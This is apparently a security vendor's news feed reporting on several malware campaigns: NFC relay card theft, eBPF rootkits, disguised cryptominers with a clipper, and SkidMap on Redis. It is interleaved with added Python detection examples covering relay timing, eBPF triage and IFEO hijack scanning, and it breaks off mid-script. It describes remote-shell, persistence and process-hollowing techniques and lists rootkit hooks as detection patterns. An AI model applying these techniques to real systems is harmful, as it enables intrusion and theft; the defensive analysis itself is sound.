&lt;p&gt;While the victim holds their card against their smartphone, the attacker is already at an ATM requesting a cash withdrawal; the same scheme also works for contactless payments at a point-of-sale terminal. When the ATM asks for the bank card, the attacker simply taps their phone, which relays the terminal's NFC commands to the victim's card and the card's responses back, so the ATM sees a genuine card. The transaction is then confirmed with the PIN the victim previously entered in the fake app.&lt;/p&gt;
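&lt;p&gt;The relay described above, as an added example that is not part of the article and is neither NFCGate nor NGate code: a Python model with a mock card, a relay that forwards each terminal command to the card and the answer back over a delayed link, and the round-trip check a terminal can apply to spot the relay. The APDU bytes (a SELECT of the PPSE directory and a minimal reply), the link delays and the 30 ms limit are constructed for the example.&lt;/p&gt;

```python
"""Added example (not from the Doctor Web article, NFCGate or NGate): a toy
model of the NFC relay, plus the round-trip-time check a terminal can apply
against it.  APDU bytes, delays and the time limit are constructed.
"""
import operator
import time

# Constructed sample: SELECT of the PPSE directory ("2PAY.SYS.DDF01"), the
# first command an EMV contactless terminal sends, and a minimal card reply
# ending in the success status word 9000.
SELECT_PPSE = bytes.fromhex("00A404000E325041592E5359532E444446303100")
PPSE_RESPONSE = bytes.fromhex("6F10840E325041592E5359532E44444630319000")
SW_FILE_NOT_FOUND = bytes.fromhex("6A82")
SW_SUCCESS = bytes.fromhex("9000")


class Card:
    """Stand-in for the victim's contactless card held against the phone."""

    def __init__(self, responses):
        self._responses = responses  # maps command APDU to response APDU

    def transceive(self, apdu):
        return self._responses.get(apdu, SW_FILE_NOT_FOUND)


class Relay:
    """Victim phone in reader mode plus attacker phone in card emulation:
    every command the terminal sends is forwarded to the real card and the
    answer is forwarded back, so the terminal talks to a genuine card."""

    def __init__(self, card, network_delay_s):
        self._card = card
        self._delay = network_delay_s
        self.log = []  # (direction, apdu hex) pairs for inspection

    def transceive(self, apdu):
        self.log.append(("terminal-to-card", apdu.hex()))
        time.sleep(self._delay)  # uplink to the victim's phone
        rsp = self._card.transceive(apdu)
        time.sleep(self._delay)  # downlink to the attacker's phone
        self.log.append(("card-to-terminal", rsp.hex()))
        return rsp


def timed_exchange(device, apdu):
    """Send one APDU and return (response, round-trip time in ms)."""
    start = time.perf_counter()
    rsp = device.transceive(apdu)
    return rsp, (time.perf_counter() - start) * 1000.0


def terminal_accepts(device, apdu, max_rtt_ms):
    """Terminal-side check.  Returns (status_ok, relay_suspected): a real
    tap answers within a few ms, a relay over a mobile network cannot."""
    rsp, rtt_ms = timed_exchange(device, apdu)
    status_ok = rsp.endswith(SW_SUCCESS)
    relay_suspected = operator.gt(rtt_ms, max_rtt_ms)
    return status_ok, relay_suspected


if __name__ == "__main__":
    card = Card({SELECT_PPSE: PPSE_RESPONSE})
    relay = Relay(card, network_delay_s=0.05)
    print("direct tap:  ok=%s relay_suspected=%s" % terminal_accepts(card, SELECT_PPSE, 30))
    print("relayed tap: ok=%s relay_suspected=%s" % terminal_accepts(relay, SELECT_PPSE, 30))
    for direction, apdu_hex in relay.log:
        print(direction, apdu_hex)
```

&lt;p&gt;The relay is transparent at the protocol level, which is why the ATM cannot tell the two cases apart by the APDUs alone; the only thing it can measure is time. A genuine tap answers within a few milliseconds, a path through two phones and a mobile network cannot, and that timing gap is the idea behind the relay-resistance checks in the EMV contactless specifications.&lt;/p&gt;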

&lt;p&gt;To prevent money theft, the analysts at “Doctor Web” have the following recommendations:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;do not share your PIN or CVV codes for your bank cards,&lt;/li&gt;
  &lt;li&gt;use an antivirus program; it will block the download and installation of malicious applications,&lt;/li&gt;
  &lt;li&gt;carefully check the addresses of web pages that ask for financial information,&lt;/li&gt;
  &lt;li&gt;only install applications from official sources such as AppGallery and Google Play,&lt;/li&gt;
  &lt;li&gt;do not talk to scammers. If you receive an unexpected call from the police, a bank or any other organization, simply hang up. If you have any doubts about the legitimacy of the call, find the contact details on the official website and contact the organization yourself.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;More about &lt;a href="https://vms.drweb.com/search/?q=Android.Banker.NGate.1&amp;lng=en"&gt;&lt;b&gt;Android.Banker.NGate.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/Android.Banker.NGate.1" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;</description></item><item><guid>https://news.drweb.com/show/?i=14955&amp;lng=en</guid><title>Malware trends: eBPF exploitation, malware configurations stored in unexpected places, and increased use of custom post-exploitation tools</title><link>https://news.drweb.com/show/?i=14955&amp;lng=en&amp;c=9</link><pubDate>Tue, 10 Dec 2024 11:09:06 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;December 10, 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;An investigation into an information security incident has allowed virus analysts at Doctor Web to uncover an ongoing campaign that incorporates many modern trends employed by cybercriminals.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;A client approached Doctor Web after suspecting that their computer infrastructure had been compromised. While analyzing the client’s data, our virus analysts identified a number of similar cases, leading them to conclude that an active campaign was underway. It appears that the hackers' efforts are primarily concentrated in Southeast Asia. During the attacks, they utilize a comprehensive suite of malware that is deployed at various stages. Unfortunately, it was impossible for our analysts to determine how initial access to the compromised machines was obtained. However, they were able to reconstruct the rest of the attack chain. Notably, the threat actors managed to maliciously exploit eBPF (extended Berkeley Packet Filter) technology.&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;eBPF lets sandboxed programs run inside the Linux kernel at defined hook points (packet processing, tracing, system calls) without loading a kernel module; it was originally developed to give finer control over the network subsystem of the Linux operating system and its processes. It has demonstrated significant potential, attracting the attention of major IT companies: almost from the moment of its inception, giants like Google, Huawei, Intel, and Netflix joined the eBPF Foundation to participate in its further development. Unfortunately, hackers have also taken an interest in eBPF.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;By providing extensive low-level capabilities, eBPF can be used by malicious actors to conceal network activity and processes, gather confidential information, and bypass firewalls and intrusion detection systems. The effort needed to detect such malware makes it well suited to APT (advanced persistent threat) attacks, where the attackers mask their presence for extended periods.&lt;/p&gt;
&lt;p&gt;These are the capabilities that the attackers decided to exploit by loading two rootkits onto the compromised machine. The first was an eBPF rootkit that concealed the operation of another rootkit, implemented as a kernel module, which in turn prepared the system for the installation of a remote access trojan. A notable feature of the trojan is its support for various traffic-tunneling technologies that allow it to communicate with the attackers from private network segments and conceal the transmission of commands.&lt;/p&gt;
&lt;p&gt;Overall, since 2023, the use of malicious eBPF software has been gaining momentum. This is evidenced by the emergence of several families of malware based on this technology, including Boopkit, BPFDoor, and Symbiote. New vulnerabilities, routinely found in this technology, only exacerbate the situation. As of now, 217 BPF vulnerabilities are known to exist, with about 100 of them discovered in 2024.&lt;/p&gt;
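&lt;p&gt;A triage pass for the eBPF techniques described above, added here as an example and not taken from the article or from the analysed malware: it reads the JSON printed by bpftool prog show -j together with the kernel log, and flags tracing programs hooked on functions used for process or network hiding, programs whose loader is disguised as a kernel thread, and the warnings the kernel emits when a program uses the bpf_probe_write_user or bpf_override_return helpers. The hook list and the "kworker" heuristic are the example's own assumptions; the bpftool and dmesg samples are constructed.&lt;/p&gt;

```python
"""Added example (not from the Doctor Web article): triage of loaded eBPF
programs from `bpftool prog show -j` output and kernel log lines, flagging
the combinations that in-kernel hiding relies on.  All input below is
constructed; on the host under investigation run it against the real
`bpftool prog show -j` and `dmesg` output.
"""
import json
import re

# Kernel functions a stealth eBPF program typically hooks to hide files and
# processes (getdents) or network activity (the /proc/net/tcp* generators).
SENSITIVE_HOOKS = (
    "getdents", "tcp4_seq_show", "tcp6_seq_show", "inet_diag",
    "sys_enter_read", "sys_exit_read",
)
# The kernel warns at load time when a program uses these helpers;
# legitimate observability tooling almost never needs them.
DANGEROUS_HELPERS = ("bpf_probe_write_user", "bpf_override_return")

# Constructed sample of `bpftool prog show -j`, trimmed to the fields used.
SAMPLE_BPFTOOL_JSON = json.dumps([
    {"id": 12, "type": "cgroup_skb", "name": "sd_fw_egress",
     "pids": [{"pid": 1, "comm": "systemd"}]},
    {"id": 87, "type": "tracepoint", "name": "hide_pid",
     "pids": [{"pid": 4471, "comm": "kworker"}]},
    {"id": 88, "type": "kprobe", "name": "tcp4_seq_show",
     "pids": [{"pid": 4471, "comm": "kworker"}]},
])

# Constructed sample of kernel log lines (the second mirrors the warning
# format used by kernel/trace/bpf_trace.c).
SAMPLE_DMESG = """\
[   12.3] systemd[1]: Started Journal Service.
[ 9031.7] kworker[4471] is installing a program with bpf_probe_write_user helper that may corrupt user memory!
"""


def suspicious_programs(bpftool_json):
    """Return ids of programs whose type, hook or loader points at process
    or network hiding rather than ordinary tracing or filtering."""
    flagged = []
    for prog in json.loads(bpftool_json):
        tracing_type = prog.get("type") in ("kprobe", "tracepoint", "raw_tracepoint")
        hooks_sensitive = any(h in prog.get("name", "") for h in SENSITIVE_HOOKS)
        loaders = [p.get("comm", "") for p in prog.get("pids", [])]
        # Real kernel threads never issue bpf() calls; a loader whose comm
        # merely looks like one ("kworker") is a disguise (heuristic).
        fake_kernel_thread = any(c.startswith("kworker") for c in loaders)
        if tracing_type and (hooks_sensitive or fake_kernel_thread):
            flagged.append(prog["id"])
    return flagged


HELPER_RE = re.compile(r"(\S+)\[(\d+)\] is installing a program with (bpf_\w+) helper")


def dangerous_helper_loads(dmesg_text):
    """Return (comm, pid, helper) for each kernel warning about a program
    that writes user memory or overrides kernel function returns."""
    hits = []
    for line in dmesg_text.splitlines():
        m = HELPER_RE.search(line)
        if m and m.group(3) in DANGEROUS_HELPERS:
            hits.append((m.group(1), int(m.group(2)), m.group(3)))
    return hits


if __name__ == "__main__":
    print("suspicious program ids:", suspicious_programs(SAMPLE_BPFTOOL_JSON))
    print("dangerous helper loads:", dangerous_helper_loads(SAMPLE_DMESG))
```

&lt;p&gt;Both checks are cheap enough to run from a cron job or an EDR sensor. The loader-name heuristic matters because an eBPF rootkit cannot hide the program from the bpf() syscall itself (BPF_PROG_GET_NEXT_ID enumerates every loaded program, which is what bpftool uses) unless it also hooks that path, so comparing bpftool's view with what the kernel logged at load time is a useful cross-check.&lt;/p&gt;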
&lt;p&gt;Another notable feature of the campaign is the rather creative approach taken by the threat actors with regards to storing the trojan's settings. Previously, they were likely to use dedicated servers for such purposes, but now instances where the malware configurations are being stored openly on public platforms are increasing. For example, the malware in question accessed platforms like GitHub and even a Chinese blog on information security. This helps draw less attention to the traffic coming from the compromised machine, as to an unsuspecting observer, the machine appears to be interacting with a safe network host. This negates the need to ensure access to a control server where settings are stored. Overall, the idea of leveraging publicly available services as a control infrastructure is not new; hackers are known to have previously used Dropbox, Google Drive, OneDrive, and even Discord for this purpose. However, regional restrictions on these services in several countries, particularly in China, make them less attractive in terms of ensuring availability. Meanwhile, access to GitHub remains available to most providers, making it preferred in the eyes of hackers.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/eBPF_02.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/eBPF_02.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/p&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/eBPF_01.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/eBPF_01.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/p&gt;
&lt;/div&gt;
&lt;p class="alignCenter"&gt;&lt;em&gt;Settings stored on GitLab and in a security blog. Curiously, in the latter case, the hacker asks for help decrypting third-party code. The code will later be sent to the trojan as an argument for one of the commands.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Another feature of this campaign is that the trojan is being adapted for later use as a component of a post-exploitation framework, a suite of software used after a computer has been accessed. Such frameworks are not inherently illegal; they are used by companies that officially provide security-audit services. The best-known tools are Cobalt Strike and Metasploit; they automate much of the post-compromise work, and Metasploit ships with a large library of exploit modules.&lt;/p&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/eBPF_04.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/eBPF_04.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/p&gt;
&lt;/div&gt;
&lt;p class="alignCenter"&gt;&lt;em&gt;An example of a network map created by Cobalt Strike (source: official website)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Of course, such capabilities are highly sought after by threat actors. In 2022, a cracked version of Cobalt Strike became available to a wide audience, leading to a surge in hacker activity. Geographically, the Cobalt Strike infrastructure has a significant presence in China. It is worth noting that the developer aims to track all Cobalt Strike installations, and servers with cracked versions are routinely shut down by law enforcement. Therefore, hackers are steadily trending towards using open-source frameworks that support extensions out of the box and are able to modify the network communication between the infected host and its control server. They prefer this strategy as it does not draw additional attention to their infrastructure.&lt;/p&gt;

&lt;p&gt;As a result of the investigation, our analysts added all identified threats to our malware databases and incorporated additional heuristic rules to ensure that malicious eBPF programs are recognized.&lt;/p&gt;
&lt;p&gt;More about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Siggen28.58279&amp;lng=en"&gt;&lt;b&gt;Trojan.Siggen28.58279&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/Trojan.Siggen28.58279" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;
</description></item><item><guid>https://news.drweb.com/show/?i=14920&amp;lng=en</guid><title>Hidden cryptocurrency mining and theft campaign affected over 28,000 users</title><link>https://news.drweb.com/show/?i=14920&amp;lng=en&amp;c=9</link><pubDate>Tue, 08 Oct 2024 14:47:30 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;October 8, 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Virus analysts at Doctor Web have identified a large-scale campaign aimed at spreading cryptomining and cryptostealing malware by delivering trojans to victims' computers under the guise of office programs, game cheats, and online trading bots.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;During routine analysis of cloud telemetry submitted by our users, specialists at the Doctor Web virus lab detected suspicious activity by a program disguised as a Windows component (&lt;span class="string"&gt;StartMenuExperienceHost.exe&lt;/span&gt;; the legitimate process with this name manages the Start menu). The program communicated with a remote network host and waited for an incoming connection, upon which it immediately launched the &lt;span class="string"&gt;cmd.exe&lt;/span&gt; command line interpreter, i.e. it gave the attackers a remote shell.&lt;/p&gt;
&lt;p&gt;Disguised as a system component was the Ncat network utility, which, when used for legitimate purposes, transfers data over the network via the command line. This discovery helped reconstruct a sequence of security events, including attempts to infect computers with malware, which were prevented by Dr.Web.&lt;/p&gt;
 
&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/1.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/october/1.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;  
&lt;div class="fx -part_2 fxItemsCenter"&gt;
  &lt;div class="paddXS paddYS noMarg cell"&gt;
      &lt;p class="alignCenter"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/2.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2024/october/2.1.png" alt="#drweb"&gt;&lt;/a&gt;
      &lt;/p&gt;
  &lt;/div&gt;
  &lt;div class="paddXS paddYS noMarg cell"&gt;
      &lt;p class="alignCenter"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/3.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2024/october/3.1.png" alt="#drweb"&gt;&lt;/a&gt;
      &lt;/p&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;p&gt;The source of infection is fraudulent pages created by attackers on GitHub (note that such activity is prohibited by the platform's rules) or Youtube pages containing malware links in the description below the video. By clicking on the link, the victim downloads a self-extracting, password-protected archive. Because the archive is encrypted, it cannot be automatically scanned by antivirus software. After entering the password provided by the hackers on the download page, the following temporary files are extracted to the &lt;span class="string"&gt;%ALLUSERSPROFILE%\jedist&lt;/span&gt; folder on the victim's computer:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;UnRar.exe&lt;/span&gt; - an application for extracting RAR archives;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;WaR.rar&lt;/span&gt; - a RAR archive;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;Iun.bat&lt;/span&gt; - a script that creates a task to run the Uun.bat script, then initiates a computer restart, and deletes itself;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;Uun.bat&lt;/span&gt; - an obfuscated script that extracts &lt;span class="string"&gt;WaR.rar&lt;/span&gt;, runs the &lt;span class="string"&gt;ShellExt.dll&lt;/span&gt; and &lt;span class="string"&gt;UTShellExt.dll&lt;/span&gt; files it contains, and then deletes the task created by &lt;span class="string"&gt;Iun.bat&lt;/span&gt; and the &lt;span class="string"&gt;jedist&lt;/span&gt; folder along with its contents.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The &lt;span class="string"&gt;ShellExt.dll&lt;/span&gt; file is an AutoIt language interpreter and is not malicious in and of itself. However, this is not its true name. Attackers have renamed it from &lt;span class="string"&gt;AutoIt3.exe&lt;/span&gt; to &lt;span class="string"&gt;ShellExt.dll&lt;/span&gt; to disguise it as a WinRAR library that is responsible for integrating archiver functionality to the Windows right-click menu. Once launched, the interpreter in turn loads the &lt;span class="string"&gt;UTShellExt.dll&lt;/span&gt; file, which the cybercriminals borrowed from the Uninstall Tool utility. Perfectly legitimate in its own right, it even carries a valid digital signature, but it has a malicious AutoIt script attached to it. Once executed, the script unpacks its payload, which consists of a series of heavily obfuscated files.&lt;/p&gt;

&lt;blockquote&gt;
  AutoIt is a programming language for creating automation scripts and utilities for Windows. Its ease of use and broad functionality have made it popular with various categories of users, including malware writers. Some antivirus programs detect all compiled AutoIt scripts as malicious.
&lt;/blockquote&gt;

&lt;p&gt;The &lt;span class="string"&gt;UTShellExt.dll&lt;/span&gt; file performs the following actions:&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;Scans the process list for running debugging software. The script contains the names of about 50 different debugging utilities, and if at least one process from this list is found, the script terminates.&lt;/li&gt;
  &lt;li&gt;If no debugging software is found, the files needed to continue the attack are extracted onto the compromised system. Some of them are “clean” and only provide network communication, while the rest perform the malicious actions.&lt;/li&gt;
  &lt;li&gt;Creates system events to obtain network access via Ncat and to execute BAT and DLL files, and modifies the registry for persistence using the IFEO technique.
    &lt;blockquote&gt;
      Image File Execution Options (IFEO) is a feature that Windows makes available to software developers: for example, it lets them have a debugger launched automatically whenever a given application starts. Attackers use the same mechanism to gain a foothold. They register the path to a malicious file as the “debugger” for a legitimate executable, so every time that executable is launched, Windows starts the malicious file instead and hands it the original command line (the real program only runs if the malicious “debugger” chooses to start it). In this case, the hackers "hijacked" Windows system services as well as the Google Chrome and Microsoft Edge update processes (&lt;span class="string"&gt;MoUsoCoreWorker.exe&lt;/span&gt;, &lt;span class="string"&gt;svchost.exe&lt;/span&gt;, &lt;span class="string"&gt;TrustedInstaller.exe&lt;/span&gt;, &lt;span class="string"&gt;GoogleUpdate.exe&lt;/span&gt; and &lt;span class="string"&gt;MicrosoftEdgeUpdate.exe&lt;/span&gt;).
    &lt;/blockquote&gt;
  &lt;/li&gt;
  &lt;li&gt;Revokes the delete and modify permissions for the folders and files created in step 2.&lt;/li&gt;
  &lt;li&gt;Disables the Windows Recovery Service&lt;/li&gt;
  &lt;li&gt;Sends the specifications of the compromised computer, its name, operating system version and information about the installed antivirus software to the attackers using a Telegram bot.&lt;/li&gt;
&lt;/ol&gt;
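&lt;p&gt;The IFEO hijack from step 3, as an added example that is neither from the article nor from the malware: a Python triage script that parses a registry export of the Image File Execution Options key and lists every Debugger value that does not point at a known developer tool. The .reg text is constructed for the example, the loader path in it is hypothetical, and the list of “expected” debuggers is the example's own assumption.&lt;/p&gt;

```python
"""Added example (not from the Doctor Web article): list IFEO "Debugger"
hijacks in a registry export.  The .reg text below is constructed and the
loader path in it is hypothetical.  On a real host export the Image File
Execution Options key with reg.exe, decode the file as UTF-16 and pass its
contents to suspicious_ifeo().
"""
import re

IFEO_KEY_RE = re.compile(
    r"^\[HKEY_LOCAL_MACHINE\\SOFTWARE\\(?:WOW6432Node\\)?Microsoft\\Windows NT\\"
    r"CurrentVersion\\Image File Execution Options\\([^\]\\]+)\]$",
    re.IGNORECASE,
)
DEBUGGER_RE = re.compile(r'^"Debugger"="(.*)"$', re.IGNORECASE)

# Debuggers a developer might legitimately register (assumption).  Anything
# else, especially a path under ProgramData or a user profile, needs a look.
EXPECTED_DEBUGGER_HINTS = ("windbg", "vsjitdebugger", "devenv", "cdb.exe")

# Constructed sample of `reg export` output (.reg doubles backslashes).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Debuggers\\x64\\windbg.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe]
"Debugger"="C:\\ProgramData\\example\\loader.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe]
"Debugger"="C:\\ProgramData\\example\\loader.exe"
"DisableExceptionChainValidation"=dword:00000000
"""


def unescape_reg_string(value):
    """Undo .reg escaping of backslashes and double quotes."""
    return value.replace('\\"', '"').replace("\\\\", "\\")


def ifeo_debuggers(reg_text):
    """Map each image name that has an IFEO Debugger value to that command."""
    entries = {}
    current_image = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            key = IFEO_KEY_RE.match(line)
            current_image = key.group(1) if key else None  # reset on other keys
            continue
        value = DEBUGGER_RE.match(line)
        if value and current_image:
            entries[current_image] = unescape_reg_string(value.group(1))
    return entries


def suspicious_ifeo(reg_text):
    """Return (image, debugger) pairs that do not look like developer tooling."""
    hits = []
    for image, debugger in ifeo_debuggers(reg_text).items():
        lowered = debugger.lower()
        if not any(hint in lowered for hint in EXPECTED_DEBUGGER_HINTS):
            hits.append((image, debugger))
    return hits


if __name__ == "__main__":
    for image, debugger in suspicious_ifeo(SAMPLE_REG):
        print("IFEO hijack: %s is started through %s" % (image, debugger))
```

&lt;p&gt;Because the registered “debugger” receives the original command line, a hijack of a core service such as svchost.exe only survives if the loader re-launches the real binary; a Debugger value on such an image is therefore almost never legitimate, and the same check should be run on the WOW6432Node copy of the key, which the pattern above accepts.&lt;/p&gt;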

&lt;p&gt;The &lt;span class="string"&gt;DeviceId.dll&lt;/span&gt; and &lt;span class="string"&gt;7zxa.dll&lt;/span&gt; files perform hidden cryptomining and cryptostealing functions, respectively. Both files inject their payload into the &lt;span class="string"&gt;explorer.exe&lt;/span&gt; (Windows Explorer) process using the Process Hollowing technique. The first file is a legitimate library distributed as part of the .NET framework that has a malicious AutoIt script embedded that executes the &lt;a href="https://vms.drweb.com/search/?q=SilentCryptoMiner&amp;lng=en"&gt;&lt;b&gt;SilentCryptoMiner&lt;/b&gt;&lt;/a&gt; miner. This miner has extensive configuration and stealth capabilities for cryptocurrency mining, as well as remote control functionality.&lt;/p&gt;

&lt;p&gt;The &lt;span class="string"&gt;7zxa.dll&lt;/span&gt; library, again a legitimate library of the 7-Zip archiver, contains a clipper. This type of malware monitors the clipboard and can either replace its contents or pass them on to attackers. In this case, the clipper waits for strings that look like cryptocurrency wallet addresses and replaces them with addresses specified by the attackers. At the time of publication, the clipper alone is confirmed to have netted the hackers more than 6,000 US dollars’ worth of cryptocurrency.&lt;/p&gt;

&lt;blockquote&gt;
  The Process Hollowing technique consists of running a trusted process in a suspended state, overwriting its code in memory with malicious code, and then resuming the process execution. The use of this technique results in the presence of copies of the process with the same name, so in our case three &lt;span class="string"&gt;explorer.exe&lt;/span&gt; processes were observed on the victims' machines, which is suspicious in itself as this process normally exists as a single copy.
&lt;/blockquote&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/Attack_Chain_en.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/october/Attack_Chain_en.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt; 
 
&lt;p&gt;In total, this malware campaign has affected more than 28,000 people, the vast majority of whom are residents of Russia. Significant numbers of infections have also been observed in Belarus, Uzbekistan, Kazakhstan, Ukraine, Kyrgyzstan and Turkey. Since the victims' computers were compromised by installing pirated versions of popular programs, the main recommendations for preventing such incidents are to download software only from official sources, to use open-source alternatives where possible, and to install capable antivirus software. Users of Dr.Web products are not affected by this threat.&lt;/p&gt;

&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.1443&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.1443&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Metack/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=14918&amp;lng=en</guid><title>Redis honeypot: server with vulnerable Redis database reveals new SkidMap modification used to hide cryptocurrency mining process</title><link>https://news.drweb.com/show/?i=14918&amp;lng=en&amp;c=9</link><pubDate>Thu, 03 Oct 2024 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;October 3, 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Doctor Web virus analysts have identified a new rootkit modification that installs the Skidmap mining trojan on compromised Linux machines. This rootkit is designed as a malicious kernel module that hides the miner’s activity by providing fake information about CPU usage and network activity. This attack appears to be indiscriminate, primarily targeting the enterprise sector—large servers and cloud environments—where mining efficiency can be maximized.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The Redis database management system is the world’s most popular NoSQL database: Redis servers are used by large companies such as X (formerly Twitter), Airbnb, Amazon and others. Its advantages are obvious: very high performance, low overhead, and support for many data types and programming languages. However, the product also has some downsides. Redis was never intended to be exposed at the network edge, so its default configuration offers only basic protection: releases before version 6 had at most a single shared password (requirepass) and no transport encryption, and fine-grained access control (ACLs) and TLS only arrived with version 6. In addition, cybersecurity publications report numerous Redis vulnerabilities each year; in 2023, for example, there were 12 vulnerabilities, three of which were rated as serious. The growing number of reports of compromised servers and the subsequent installation of mining programs sparked the interest of Doctor Web's virus lab staff, who wanted to experience the attack firsthand. For this purpose, they decided to set up their own unprotected Redis server and wait for uninvited guests. The server was active for a year, and during that time it was attacked about 10–14 thousand times a month. Recently, the server was hit with a modification of the SkidMap trojan, as our analysts expected. What came as a surprise, however, was that the cybercriminals used a new method to hide the miner's activity and installed four backdoors at the same time.&lt;/p&gt;

&lt;p&gt;The Skidmap trojan first made headlines in 2019. This trojan-miner is specialized and mainly targets enterprise networks since the greatest stealth mining profits can be achieved in the corporate segment. Despite the fact that five years have passed since the trojan’s debut, the principle of its operation remains unchanged: the trojan is installed on a system by exploiting vulnerabilities or through misconfigured software. In the case of our honeypot server, the hackers added tasks to the system scheduler in which a script downloaded the &lt;a href="https://vms.drweb.com/search/?q=Linux.MulDrop.142&amp;lng=en"&gt;&lt;b&gt;Linux.MulDrop.142&lt;/b&gt;&lt;/a&gt; dropper (or its other modification, &lt;a href="https://vms.drweb.com/search/?q=Linux.MulDrop.143&amp;lng=en"&gt;&lt;b&gt;Linux.MulDrop.143&lt;/b&gt;&lt;/a&gt;) every 10 minutes. This executable checks the OS kernel version, disables the SELinux security module, and then unpacks the &lt;a href="https://vms.drweb.com/search/?q=Linux.Rootkit.400&amp;lng=en"&gt;&lt;b&gt;Linux.Rootkit.400&lt;/b&gt;&lt;/a&gt; rootkit, the &lt;a href="https://vms.drweb.com/search/?q=Linux.BtcMine.815&amp;lng=en"&gt;&lt;b&gt;Linux.BtcMine.815&lt;/b&gt;&lt;/a&gt; miner, and the &lt;a href="https://vms.drweb.com/search/?q=Linux.BackDoor.Pam.8&amp;lng=en"&gt;&lt;b&gt;Linux.BackDoor.Pam.8&lt;/b&gt;&lt;/a&gt;&lt;b&gt;/9&lt;/b&gt; and &lt;a href="https://vms.drweb.com/search/?q=Linux.BackDoor.SSH.425&amp;lng=en"&gt;&lt;b&gt;Linux.BackDoor.SSH.425&lt;/b&gt;&lt;/a&gt;&lt;b&gt;/426&lt;/b&gt; backdoors on the system. The dropper is remarkable in that it is quite large, as it packs about 60 executables for various Linux distributions. In this case, the dropper contained the files for various versions of Debian and Red Hat Enterprise Linux distributions, which are most commonly encountered on servers.&lt;/p&gt;
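&lt;p&gt;The scheduler persistence used here (a cron job re-fetching the dropper every 10 minutes), as an added example that is not from the article: a Python scan of crontab text that flags entries which download remote content or execute something they fetched, and records how often they run. The crontab lines are constructed (198.51.100.7 is a documentation address), and the keyword lists are the example's own heuristics.&lt;/p&gt;

```python
"""Added example (not from the Doctor Web article): scan crontab text for
the download-and-execute persistence used by the SkidMap dropper chain.
The crontab lines are constructed (198.51.100.7 is a documentation address);
on a real host feed it `crontab -l` for every user, /etc/crontab and the
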